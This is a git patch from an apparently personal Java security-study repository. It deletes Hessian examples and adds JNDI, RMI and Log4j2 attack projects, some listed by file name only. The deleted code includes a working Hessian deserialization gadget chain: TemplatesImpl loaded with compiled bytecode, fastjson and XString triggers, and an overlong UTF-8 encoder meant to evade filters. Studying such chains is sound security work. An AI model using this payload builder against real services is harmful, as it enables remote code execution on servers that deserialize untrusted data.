TemplatesImpl(); - setFieldValue(templatesImpl, "_class", null); - setFieldValue(templatesImpl, "_name", "any"); - setFieldValue(templatesImpl, "_tfactory", new TransformerFactoryImpl()); - byte[] bytes = Files.readAllBytes(Paths.get("D://1tmp//classes//CalcAbs.class")); - setFieldValue(templatesImpl, "_bytecodes", new byte[][] {bytes}); - return templatesImpl; - } - - public static HashMap makeMap (Object v1, Object v2 ) - throws Exception { - HashMap s = new HashMap<>(); - setFieldValue(s, "size", 2); - Class nodeC; - try { - nodeC = 
Class.forName("java.util.HashMap$Node"); - } - catch ( ClassNotFoundException e ) { - nodeC = Class.forName("java.util.HashMap$Entry"); - } - Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, - Object.class, Object.class, nodeC); - nodeCons.setAccessible(true); - Object tbl = Array.newInstance(nodeC, 2); - Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); - Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); - setFieldValue(s, "table", tbl); - return s; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java deleted file mode 100644 index 1b722bc..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/Hello.java +++ /dev/null @@ -1,9 +0,0 @@ -package com.hessian.asServlet; - -import com.hessian.pojo.Person; - -public interface Hello { - public String sayHello(String name); - - public Person changeAge(Person person, int age); -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java deleted file mode 100644 index d978ba0..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloClient.java +++ /dev/null @@ -1,19 +0,0 @@ -package com.hessian.asServlet; - -import com.caucho.hessian.client.HessianProxyFactory; -import com.hessian.pojo.Person; - -import java.net.MalformedURLException; -import java.util.Properties; - -public class HelloClient { - public static void main(String[] args) throws MalformedURLException { - HessianProxyFactory factory = new HessianProxyFactory(); - Hello hello = (Hello) factory.create(Hello.class, "http://127.0.0.1:8081/hello"); - - String name = "1diOt9"; - System.out.println("test: " + hello.sayHello(name)); - - - } -} 
diff --git a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java b/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java deleted file mode 100644 index aa503e7..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/asServlet/HelloServer.java +++ /dev/null @@ -1,18 +0,0 @@ -package com.hessian.asServlet; - -import com.caucho.hessian.server.HessianServlet; -import com.hessian.pojo.Person; - -public class HelloServer extends HessianServlet implements Hello{ - @Override - public String sayHello(String name) { - System.out.println("Hello " + name); - return "Hello " + name; - } - - @Override - public Person changeAge(Person person, int age) { - person.setAge(age); - return person; - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java deleted file mode 100644 index ea17da0..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/DeserTest.java +++ /dev/null @@ -1,20 +0,0 @@ -package com.hessian.deser; - -import com.caucho.hessian.io.Hessian2Input; -import com.hessian.pojo.Person; - -import java.io.FileInputStream; -import java.io.FileNotFoundException; -import java.io.IOException; - -public class DeserTest { - public static void main(String[] args) throws IOException { - FileInputStream fis = new FileInputStream("ser.bin"); - Hessian2Input hessian2Input = new Hessian2Input(fis); - Person obj = (Person) hessian2Input.readObject(); - hessian2Input.close(); - System.out.println(obj.getClass().getName()); - System.out.println(obj.getAge()); - - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java deleted file mode 100644 index b69ef4e..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/Hessian2OutputWithOverlongEncoding.java +++ /dev/null 
@@ -1,107 +0,0 @@ -package com.hessian.deser; - -import com.caucho.hessian.io.Hessian2Output; - -import java.io.IOException; -import java.io.OutputStream; -import java.lang.reflect.Field; - -public class Hessian2OutputWithOverlongEncoding extends Hessian2Output { - public Hessian2OutputWithOverlongEncoding(OutputStream os) { - super(os); - } - - @Override - public void printString(String v, int strOffset, int length) throws IOException { - int offset = (int) getSuperFieldValue("_offset"); - byte[] buffer = (byte[]) getSuperFieldValue("_buffer"); - - for (int i = 0; i < length; i++) { - if (SIZE <= offset + 16) { - setSuperFieldValue("_offset", offset); - flushBuffer(); - offset = (int) getSuperFieldValue("_offset"); - } - - char ch = v.charAt(i + strOffset); - - // 2 bytes UTF-8 - buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f)); - buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f)); - -// if (ch < 0x80) -// buffer[offset++] = (byte) (ch); -// else if (ch < 0x800) { -// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } -// else { -// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf)); -// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } - } - - setSuperFieldValue("_offset", offset); - } - - @Override - public void printString(char[] v, int strOffset, int length) throws IOException { - int offset = (int) getSuperFieldValue("_offset"); - byte[] buffer = (byte[]) getSuperFieldValue("_buffer"); - - for (int i = 0; i < length; i++) { - if (SIZE <= offset + 16) { - setSuperFieldValue("_offset", offset); - flushBuffer(); - offset = (int) getSuperFieldValue("_offset"); - } - - char ch = v[i + strOffset]; - - // 2 bytes UTF-8 - buffer[offset++] = (byte) (0xc0 + (convert(ch)[0] & 0x1f)); - buffer[offset++] = (byte) (0x80 + (convert(ch)[1] & 0x3f)); - -// if (ch < 0x80) -// buffer[offset++] = (byte) (ch); -// else if (ch < 0x800) { 
-// buffer[offset++] = (byte) (0xc0 + ((ch >> 6) & 0x1f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } -// else { -// buffer[offset++] = (byte) (0xe0 + ((ch >> 12) & 0xf)); -// buffer[offset++] = (byte) (0x80 + ((ch >> 6) & 0x3f)); -// buffer[offset++] = (byte) (0x80 + (ch & 0x3f)); -// } - } - - setSuperFieldValue("_offset", offset); - } - - public int[] convert(int i) { - int b1 = ((i >> 6) & 0b11111) | 0b11000000; - int b2 = (i & 0b111111) | 0b10000000; - return new int[]{ b1, b2 }; - } - - public Object getSuperFieldValue(String name) { - try { - Field f = this.getClass().getSuperclass().getDeclaredField(name); - f.setAccessible(true); - return f.get(this); - } catch (Exception e) { - return null; - } - } - - public void setSuperFieldValue(String name, Object val) { - try { - Field f = this.getClass().getSuperclass().getDeclaredField(name); - f.setAccessible(true); - f.set(this, val); - } catch (Exception e) { - e.printStackTrace(); - } - } -} \ No newline at end of file diff --git a/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java b/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java deleted file mode 100644 index 970ddeb..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/deser/UTF_8_OverLong.java +++ /dev/null 
@@ -1,47 +0,0 @@ -package com.hessian.deser; - -import com.alibaba.fastjson.JSONObject; -import com.caucho.hessian.io.Hessian2Input; -import com.caucho.hessian.io.Hessian2Output; -import com.caucho.hessian.io.SerializerFactory; -import com.hessian.Tools; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.alibaba.fastjson.JSONArray; -import com.sun.org.apache.xpath.internal.objects.XString; - -import java.io.FileInputStream; -import java.io.FileOutputStream; -import java.io.IOException; -import java.util.HashMap; - -public class UTF_8_OverLong { - public static void main(String[] args) throws Exception { - TemplatesImpl templates = Tools.getTemplatesImpl(); - - JSONArray jsonArray = new JSONArray(); - jsonArray.add(templates); -// jsonArray.toString(); -// JSONArray jsonArray = new JSONArray(); -// jsonArray.add(templates); - XString xString = new XString("xx"); - - HashMap map1 = new HashMap(); - HashMap map2 = new HashMap(); - map1.put("yy",jsonArray); - map1.put("zZ",xString); - map2.put("yy",xString); - map2.put("zZ",jsonArray); - - HashMap hashMap = Tools.makeMap(map1, map2); - - FileOutputStream fos = new FileOutputStream("D://1tmp//utf8.bin"); - Hessian2OutputWithOverlongEncoding output = new Hessian2OutputWithOverlongEncoding(fos); - output.setSerializerFactory(new SerializerFactory()); - output.getSerializerFactory().setAllowNonSerializable(true); - output.writeObject(hashMap); - output.close(); - -// FileInputStream fis = new FileInputStream("utf8.bin"); -// new Hessian2Input(fis).readObject(); - } -} diff --git a/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java b/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java deleted file mode 100644 index 6df809b..0000000 --- a/hessian/HessianStudy/src/main/java/com/hessian/pojo/Person.java +++ /dev/null 
@@ -1,27 +0,0 @@
-package com.hessian.pojo;
-
-import java.util.HashMap;
-import java.util.Properties;
-
-public class Person implements java.io.Serializable {
- private String name;
- private int age;
-// private HashMap map;
-
- public Person() {
- }
-
- public Person(String name, int age) {
- this.name = name;
- this.age = age;
-// this.map = map;
- }
-
- public int getAge() {
- return age;
- }
-
- public void setAge(int age) {
- this.age = age;
- }
-}
diff --git a/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java b/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java
deleted file mode 100644
index 16cc623..0000000
--- a/hessian/HessianStudy/src/main/java/com/hessian/ser/SerTest.java
+++ /dev/null
@@ -1,28 +0,0 @@
-package com.hessian.ser;
-
-import com.caucho.hessian.io.Hessian2Input;
-import com.caucho.hessian.io.Hessian2Output;
-import com.hessian.pojo.Person;
-
-import java.io.*;
-import java.util.HashMap;
-
-public class SerTest {
- public static void main(String[] args) throws IOException {
- HashMap hashMap = new HashMap<>();
- hashMap.put("name", "maxyyy");
-
- Person person = new Person("1diOt9", 20);
-// FileOutputStream fos = new FileOutputStream("ser.bin");
- ByteArrayOutputStream baos = new ByteArrayOutputStream();
- Hessian2Output output = new Hessian2Output(baos);
- output.writeObject(hashMap);
- output.close();
- byte[] bytes = baos.toByteArray();
-
- ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
- Hessian2Input input = new Hessian2Input(bais);
- input.readObject();
- input.close();
- }
-}
diff --git a/hessian/HessianStudy/utf8.bin b/hessian/HessianStudy/utf8.bin deleted file mode 100644 index 21016add771ab06ef6b24b6929531d003342e9a5..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2019 zcmbtV-ESL35TA8ypY6IylQiYKv_Pp7XfK8G071|+1tpT35)u`WzOcC*&Y|;Ndv`__ zZ#=?7TMASN9#9+7FC})VP3sg1F|Yg&{40pxt}ltD8YQSY?d^R2W_E7&W^yvY>%4wp zKQD8g*Z!>WHD2Z0d>uO$_#2=a+~hlW*SQAC*ZeJC;*0zx-@|i_*C$5b+H`O5Z`!C1 z)lCg|7beSmi&wz4K(AscnA=1_^$R-_6`23&0kIN z&)Rp5S9(FVU1~5`g;^73HU0%uYd4fCnqn04MdY}K;~{nqs_UqL0#+4JCXFY!EPO~AtblOA;>UcYqtLYjZV6C<8X{r%TJ5C0&d<8(Yn1|7=L z%XBzH1+@9WC8f4~al#U@7dfm#?YxFuk zM{FnP#7?_6sCbc6woP0Kw7(V2sXO4>Xs1D)yW^WvXEra2pf`64yaCkV+eXyY=#chr z)#$@^GB|z7jy9R0!f;0&V=?Y;(yrQ;pu>d@?M9V5L>~mcWryJy9mJo+z@LUFN$7sc zQi5{ePGA?cnC{-fbRv@hovz0VD-}g z-U@e0ONqo5R9d_BX^0WHKp8_QYLND7y`Ul5hu})~1U-rH3ic^T6zscLDxpVU2Q=(~ zwz4bi)AS5LHnM#d6?l&J$FSqrRmkk`l=}DqrHflx=d@xkN;afJv~$bS^K<|X8Dw`5 zWx%f(oGQZ$STBN3&`Zo(6Pvj*KXY~dU-ZD*n*aa+ diff --git a/hessian/dubbo/.gitignore b/hessian/dubbo/.gitignore deleted file mode 100644 index 5ff6309..0000000 --- a/hessian/dubbo/.gitignore +++ /dev/null @@ -1,38 +0,0 @@ -target/ -!.mvn/wrapper/maven-wrapper.jar -!**/src/main/**/target/ -!**/src/test/**/target/ - -### IntelliJ IDEA ### -.idea/modules.xml -.idea/jarRepositories.xml -.idea/compiler.xml -.idea/libraries/ -*.iws -*.iml -*.ipr - -### Eclipse ### -.apt_generated -.classpath -.factorypath -.project -.settings -.springBeans -.sts4-cache - -### NetBeans ### -/nbproject/private/ -/nbbuild/ -/dist/ -/nbdist/ -/.nb-gradle/ -build/ -!**/src/main/**/build/ -!**/src/test/**/build/ - -### VS Code ### -.vscode/ - -### Mac OS ### -.DS_Store \ No newline at end of file diff --git a/hessian/dubbo/.idea/.gitignore b/hessian/dubbo/.idea/.gitignore deleted file mode 100644 index 35410ca..0000000 --- a/hessian/dubbo/.idea/.gitignore +++ /dev/null 
@@ -1,8 +0,0 @@ -# 默认忽略的文件 -/shelf/ -/workspace.xml -# 基于编辑器的 HTTP 客户端请求 -/httpRequests/ -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml diff --git a/hessian/dubbo/.idea/encodings.xml b/hessian/dubbo/.idea/encodings.xml deleted file mode 100644 index aa00ffa..0000000 --- a/hessian/dubbo/.idea/encodings.xml +++ /dev/null @@ -1,7 +0,0 @@ - - - - - - - \ No newline at end of file diff --git a/hessian/dubbo/.idea/misc.xml b/hessian/dubbo/.idea/misc.xml deleted file mode 100644 index 8345e46..0000000 --- a/hessian/dubbo/.idea/misc.xml +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - \ No newline at end of file diff --git a/hessian/dubbo/.idea/vcs.xml b/hessian/dubbo/.idea/vcs.xml deleted file mode 100644 index d843f34..0000000 --- a/hessian/dubbo/.idea/vcs.xml +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/hessian/dubbo/pom.xml b/hessian/dubbo/pom.xml deleted file mode 100644 index 620f038..0000000 --- a/hessian/dubbo/pom.xml +++ /dev/null @@ -1,29 +0,0 @@ - - - 4.0.0 - - org.example - dubbo - 1.0-SNAPSHOT - - - 8 - 8 - UTF-8 - - - - - com.caucho - hessian - 4.0.63 - - - org.apache.dubbo - dubbo - 2.7.6 - - - \ No newline at end of file diff --git a/hessian/dubbo/src/main/java/org/example/Main.java b/hessian/dubbo/src/main/java/org/example/Main.java deleted file mode 100644 index 407f157..0000000 --- a/hessian/dubbo/src/main/java/org/example/Main.java +++ /dev/null @@ -1,7 +0,0 @@ -package org.example; - -public class Main { - public static void main(String[] args) { - System.out.println("Hello world!"); - } -} \ No newline at end of file From 8e0ae62058efbddead11a42ff5e47128a43d2e55 Mon Sep 17 00:00:00 2001 
From: 1diot9 <2868944833@qq.com> Date: Mon, 8 Dec 2025 14:41:08 +0800 Subject: [PATCH 15/16] update: JNDI --- .../.idea/copilot.data.migration.agent.xml | 6 + .../JNDI/.idea/copilot.data.migration.ask.xml | 6 + .../copilot.data.migration.ask2agent.xml | 6 + .../.idea/copilot.data.migration.edit.xml | 6 + JNDI/JNDI/.idea/misc.xml | 2 +- JNDI/{JNDI_vul => JNDI}/.idea/uiDesigner.xml | 0 JNDI/JNDI/.idea/vcs.xml | 1 + JNDI/JNDI/ClassByteGen/AAAA.class | Bin 0 -> 338 bytes JNDI/JNDI/com/sun/proxy/$Proxy0.class | Bin 0 -> 2180 bytes JNDI/JNDI/com/sun/proxy/$Proxy1.class | Bin 0 -> 1750 bytes JNDI/JNDI/pom.xml | 51 ++- .../JNDI_Develop/DNSContextFactoryTest.java | 36 -- .../src/main/java/JndiClient.java} | 6 +- .../src/main/java/LDAP/codebaseServer.java} | 54 +-- JNDI/JNDI/src/main/java/LDAP/deserServer.java | 111 ++++++ JNDI/JNDI/src/main/java/RMI/Client.java | 23 ++ JNDI/JNDI/src/main/java/RMI/EvilRegistry.java | 350 ++++++++++++++++++ JNDI/JNDI/src/main/java/RMI/MyRegistry.java | 14 + JNDI/JNDI/src/main/java/RMI/Server.java | 78 ++++ .../src/main/java/RMI/ServerBypassJEP290.java | 73 ++++ JNDI/JNDI/src/main/java/RMIServer.java | 18 + JNDI/JNDI/src/main/java/remoteObj/Hello.java | 8 + .../src/main/java/remoteObj/HelloImpl.java | 14 + .../src/main/java/tools/ClassByteGen.java | 29 ++ .../java/tools/InvocationHandlerImpl.java | 19 + JNDI/JNDI/src/main/java/tools/Payload.java | 10 + JNDI/JNDI/src/main/java/tools/PayloadGen.java | 23 ++ .../src/main/java/tools/ReflectTools.java | 71 ++++ .../src/main/java/tools/TemplatesGen.java | 35 ++ JNDI/JNDI_vul/.idea/encodings.xml | 11 - JNDI/JNDI_vul/client/pom.xml | 20 - JNDI/JNDI_vul/pom.xml | 93 ----- JNDI/JNDI_vul/server/pom.xml | 20 - .../java/factory/beanFactory/EL_test.java | 15 - .../JNDIBypassHighJavaServerEL.java | 31 -- .../factory/trustSerialFalse/ldapserver.java | 61 --- .../main/java/factory/withJDBC/rmi/dbcp.java | 48 --- .../factory/withJDBC/rmi/tomcat_dbcp.java | 36 -- JNDI/{JNDI_vul => Log4j2}/.gitignore | 0 
JNDI/{JNDI_vul => Log4j2}/.idea/.gitignore | 0 .../.idea/copilot.data.migration.agent.xml | 6 + .../.idea/copilot.data.migration.ask.xml | 6 + .../copilot.data.migration.ask2agent.xml | 6 + .../.idea/copilot.data.migration.edit.xml | 6 + JNDI/Log4j2/.idea/encodings.xml | 7 + JNDI/{JNDI_vul => Log4j2}/.idea/misc.xml | 0 JNDI/{JNDI_vul => Log4j2}/.idea/vcs.xml | 0 JNDI/Log4j2/logs/app.log | 125 +++++++ JNDI/Log4j2/pom.xml | 44 +++ .../Log4j2/src/main/java/com/example/App.java | 35 ++ .../src/main/java/com/example/BypassWaf.java | 31 ++ .../com/example/spring/WebApplication.java | 11 + .../spring/controller/IndexController.java | 31 ++ .../Log4j2/src/main/java/com/example/tmp.java | 21 ++ .../src/main/resources/application.yaml | 2 + JNDI/Log4j2/src/main/resources/log4j2.xml | 37 ++ MiddleWare/Tomcat/.gitignore | 38 ++ MiddleWare/Tomcat/.idea/.gitignore | 8 + MiddleWare/Tomcat/.idea/encodings.xml | 7 + MiddleWare/Tomcat/.idea/misc.xml | 14 + MiddleWare/Tomcat/.idea/vcs.xml | 4 + MiddleWare/Tomcat/pom.xml | 21 ++ .../src/main/java/com/test/servlet.java | 4 + .../Tomcat/src/main/java/com/test/tmp.java | 4 + .../Tomcat/src/main/webapp/WEB-INF/web.xml | 7 + MiddleWare/Tomcat/src/main/webapp/index.jsp | 16 + .../src/main/java/com/test/gadget/c3p0.java | 4 + 67 files changed, 1462 insertions(+), 418 deletions(-) create mode 100644 JNDI/JNDI/.idea/copilot.data.migration.agent.xml create mode 100644 JNDI/JNDI/.idea/copilot.data.migration.ask.xml create mode 100644 JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml create mode 100644 JNDI/JNDI/.idea/copilot.data.migration.edit.xml rename JNDI/{JNDI_vul => JNDI}/.idea/uiDesigner.xml (100%) create mode 100644 JNDI/JNDI/ClassByteGen/AAAA.class create mode 100644 JNDI/JNDI/com/sun/proxy/$Proxy0.class create mode 100644 JNDI/JNDI/com/sun/proxy/$Proxy1.class delete mode 100644 JNDI/JNDI/src/main/java/JNDI_Develop/DNSContextFactoryTest.java rename JNDI/{JNDI_vul/client/src/main/java/InitialC.java => 
JNDI/src/main/java/JndiClient.java} (53%) rename JNDI/{JNDI_vul/server/src/main/java/normal_ldap/JNDILdapServer.java => JNDI/src/main/java/LDAP/codebaseServer.java} (81%) create mode 100644 JNDI/JNDI/src/main/java/LDAP/deserServer.java create mode 100644 JNDI/JNDI/src/main/java/RMI/Client.java create mode 100644 JNDI/JNDI/src/main/java/RMI/EvilRegistry.java create mode 100644 JNDI/JNDI/src/main/java/RMI/MyRegistry.java create mode 100644 JNDI/JNDI/src/main/java/RMI/Server.java create mode 100644 JNDI/JNDI/src/main/java/RMI/ServerBypassJEP290.java create mode 100644 JNDI/JNDI/src/main/java/RMIServer.java create mode 100644 JNDI/JNDI/src/main/java/remoteObj/Hello.java create mode 100644 JNDI/JNDI/src/main/java/remoteObj/HelloImpl.java create mode 100644 JNDI/JNDI/src/main/java/tools/ClassByteGen.java create mode 100644 JNDI/JNDI/src/main/java/tools/InvocationHandlerImpl.java create mode 100644 JNDI/JNDI/src/main/java/tools/Payload.java create mode 100644 JNDI/JNDI/src/main/java/tools/PayloadGen.java create mode 100644 JNDI/JNDI/src/main/java/tools/ReflectTools.java create mode 100644 JNDI/JNDI/src/main/java/tools/TemplatesGen.java delete mode 100644 JNDI/JNDI_vul/.idea/encodings.xml delete mode 100644 JNDI/JNDI_vul/client/pom.xml delete mode 100644 JNDI/JNDI_vul/pom.xml delete mode 100644 JNDI/JNDI_vul/server/pom.xml delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/EL_test.java delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/beanFactory/JNDIBypassHighJavaServerEL.java delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/trustSerialFalse/ldapserver.java delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/dbcp.java delete mode 100644 JNDI/JNDI_vul/server/src/main/java/factory/withJDBC/rmi/tomcat_dbcp.java rename JNDI/{JNDI_vul => Log4j2}/.gitignore (100%) rename JNDI/{JNDI_vul => Log4j2}/.idea/.gitignore (100%) create mode 100644 JNDI/Log4j2/.idea/copilot.data.migration.agent.xml create mode 100644 
JNDI/Log4j2/.idea/copilot.data.migration.ask.xml create mode 100644 JNDI/Log4j2/.idea/copilot.data.migration.ask2agent.xml create mode 100644 JNDI/Log4j2/.idea/copilot.data.migration.edit.xml create mode 100644 JNDI/Log4j2/.idea/encodings.xml rename JNDI/{JNDI_vul => Log4j2}/.idea/misc.xml (100%) rename JNDI/{JNDI_vul => Log4j2}/.idea/vcs.xml (100%) create mode 100644 JNDI/Log4j2/logs/app.log create mode 100644 JNDI/Log4j2/pom.xml create mode 100644 JNDI/Log4j2/src/main/java/com/example/App.java create mode 100644 JNDI/Log4j2/src/main/java/com/example/BypassWaf.java create mode 100644 JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java create mode 100644 JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java create mode 100644 JNDI/Log4j2/src/main/java/com/example/tmp.java create mode 100644 JNDI/Log4j2/src/main/resources/application.yaml create mode 100644 JNDI/Log4j2/src/main/resources/log4j2.xml create mode 100644 MiddleWare/Tomcat/.gitignore create mode 100644 MiddleWare/Tomcat/.idea/.gitignore create mode 100644 MiddleWare/Tomcat/.idea/encodings.xml create mode 100644 MiddleWare/Tomcat/.idea/misc.xml create mode 100644 MiddleWare/Tomcat/.idea/vcs.xml create mode 100644 MiddleWare/Tomcat/pom.xml create mode 100644 MiddleWare/Tomcat/src/main/java/com/test/servlet.java create mode 100644 MiddleWare/Tomcat/src/main/java/com/test/tmp.java create mode 100644 MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml create mode 100644 MiddleWare/Tomcat/src/main/webapp/index.jsp create mode 100644 hessian/src/main/java/com/test/gadget/c3p0.java diff --git a/JNDI/JNDI/.idea/copilot.data.migration.agent.xml b/JNDI/JNDI/.idea/copilot.data.migration.agent.xml new file mode 100644 index 0000000..4ea72a9 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file 
diff --git a/JNDI/JNDI/.idea/copilot.data.migration.ask.xml b/JNDI/JNDI/.idea/copilot.data.migration.ask.xml new file mode 100644 index 0000000..7ef04e2 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.ask.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml b/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml new file mode 100644 index 0000000..1f2ea11 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.ask2agent.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/copilot.data.migration.edit.xml b/JNDI/JNDI/.idea/copilot.data.migration.edit.xml new file mode 100644 index 0000000..8648f94 --- /dev/null +++ b/JNDI/JNDI/.idea/copilot.data.migration.edit.xml @@ -0,0 +1,6 @@ + + + + + \ No newline at end of file diff --git a/JNDI/JNDI/.idea/misc.xml b/JNDI/JNDI/.idea/misc.xml index 8345e46..805d844 100644 --- a/JNDI/JNDI/.idea/misc.xml +++ b/JNDI/JNDI/.idea/misc.xml @@ -8,7 +8,7 @@ - + \ No newline at end of file diff --git a/JNDI/JNDI_vul/.idea/uiDesigner.xml b/JNDI/JNDI/.idea/uiDesigner.xml similarity index 100% rename from JNDI/JNDI_vul/.idea/uiDesigner.xml rename to JNDI/JNDI/.idea/uiDesigner.xml diff --git a/JNDI/JNDI/.idea/vcs.xml b/JNDI/JNDI/.idea/vcs.xml index b2bdec2..64713b8 100644 --- a/JNDI/JNDI/.idea/vcs.xml +++ b/JNDI/JNDI/.idea/vcs.xml @@ -2,5 +2,6 @@ + \ No newline at end of file diff --git a/JNDI/JNDI/ClassByteGen/AAAA.class b/JNDI/JNDI/ClassByteGen/AAAA.class new file mode 100644 index 0000000000000000000000000000000000000000..0a0e726ce7c5c88e15814b1f746f4e9ac5b6f48b GIT binary patch literal 338 zcmZXPK~KU!6ols$XvDG`e~6F{jNOt1d%AS^MqE^nHn^G$syNw|p)Hm0V~ zS<*j*JQlfB^EpEr2rZ;Za0lCh0nXtHl+ofE(|l1#HP$Itt=cc%+9J4y!vQM?J}PiQ m@YuE4TZs*7&C@l`URGOAmbuG>d=gJ9-A}al&lfy!aQO%24MM{J literal 0 HcmV?d00001 
diff --git a/JNDI/JNDI/com/sun/proxy/$Proxy0.class b/JNDI/JNDI/com/sun/proxy/$Proxy0.class new file mode 100644 index 0000000000000000000000000000000000000000..8592ed34d4d7677a3308d54e5db9f3a719f2c9fe GIT binary patch literal 2180 zcmZ`)ZC4Xl5PmLDHZ0pJk)V|qX%!7%vq)Q88``P}C6zZ>qz(4PWphaan_bv!P=7-I ziyzeXfYsB|&;3z7oqO+wT_B#ElbfBHedd{GW^Vrd@6F!;Zr}++=Tz0JhTkw`v-4Z_ zo^86eS2hE_>2fDD3*MgZ*kRT8=4`Lz@*qFD#?UeCmpFqy^VH!x!dYiHfBNO+z<>Ho z!+Qo8+H`b6qqBB{;bMzS3p}j&r92VhyA9hV#7vUV(#96?$&aoxunNOS3xv~L4ZM#J zx+w7(LUa6@S#Nmej$mb8k>n;c^cd)Z-i0*IF`SKyPzg0;7%s=wcj}_yJW;QbT-&6K z)q;8p#!=0W60T;Qr%eVv#Kmr0KtDrI%;>J~yWI9P3^EuS>S4`x8^oeLJGyS*5{7jQ z;Uk7K@mn)N;0GEmQ!irUO2Z4QHGb4p4I>QaV*hF-@SoTlF4u64As0KEsyy^c+;Q!I zmySXcV51BdlDZtl&`gOD8P_p}>taME8B(Edg+bLTGxTOh6KW`H-at-ujm9a_HRaXt zseqxcv=eYU)fY#~DQcxWbl1pB#y{qmT|1ux`fPJ(^KpzR5Dmo^#t zj&S78L_vfxg|BtwK}(g9BAra5;dWEls&5vS5+dCd#3!i!ie0a$HKR5b4BS(^z9U!F z3uT856fi3ieNVfr*JI z!JUZ6V3c5zMaZAMIGh)-#4mzP6Ker0P610-{|VTe_#%R}PVl~^c=x}?w@vDIUL<*o z;!pD)z_hf-{5wd*X_9^hvr#G`uaI&$s$i~JL4F_ipPwuugN!UfoT7*f`i>Qm!aNot z#$D?*~NW*0MXA${}ihP9)6?aR;IY)7GFG<^S faeN;H-Kqa3|+G|r{>*dNTrr`te2K) zTTaDv`L@kVo|$uAijw8kg!9mH$~Jei>2-$AIZ@^e`oeCBzmS&=hJmw>S6#9DtA=w1 z7&>%xK_gqAX1LNO(=zv}qMRi{{FkO>6Jjz-Xk}}M_+-=18CaEJybZ!xt_IHILN_J8 zNN6QdHycgId?8tx*L`x+8hQOAW*@Byy$U=UXsdP7DJgs{2gXc%TNw$x$WvYW&rmP$W2a1En6M(`oS z#qiaF>k3!H7|kMdt~DL6R_Di4)iBO*IlO;Tb;T=d%jOzxFieIQt*$(E%DiM-E-xR4 zM!?bxgVDYm$B?F^L?(1(a8pWTh9T~Wg6Gzp3PWEi9qEShW(`cLsgax_Q&YDZK9w+2 z1XHydRi#$yM$W+J>eUw~dYE%OUg6Y_FX=_i@%;W7n8j@!S$sv#*^(Ws3Bk|?_$epl zs!Xbh#c}^cgXe6k(aX{bEb5rYH*xeZbXT~ibi#12 z4M0>p3LpyEnoOWH1K;A2#9oTSjN=x=wQ!1gQD~N`Dl#&*RfenY2~r|jqc4F^veB?A z+`tn|=}6(}sSR!w?9cj{jsm`87!8qq@_FGcil$SJC%VsuK7uY+t?X5tX> zefkA-(!cceq6bD0_lV+T{Ef^TT*~~8zRthUUyMx@-eRZ||6t?*AMG72|A|cT<{>^g z@`HykgzNN3+K+uZOwEcWFfkP*xE~N14ie0;0Qs}uj+P`W@e5!R#9G2iD`Dw#b_(_u zZU?aQ0qkf1d#44PJ;2?))5u9AePn4RauWR~kmL9o_X1=$KweKg_yZ3UIcms!G3Fl% z2UvcMK6R0g(S`4rQI3^k$DMtutWcad!1^JIlFVjs_~D4MfVOfLkA0iN2HDnR@IO_F BtO)=B literal 0 HcmV?d00001 
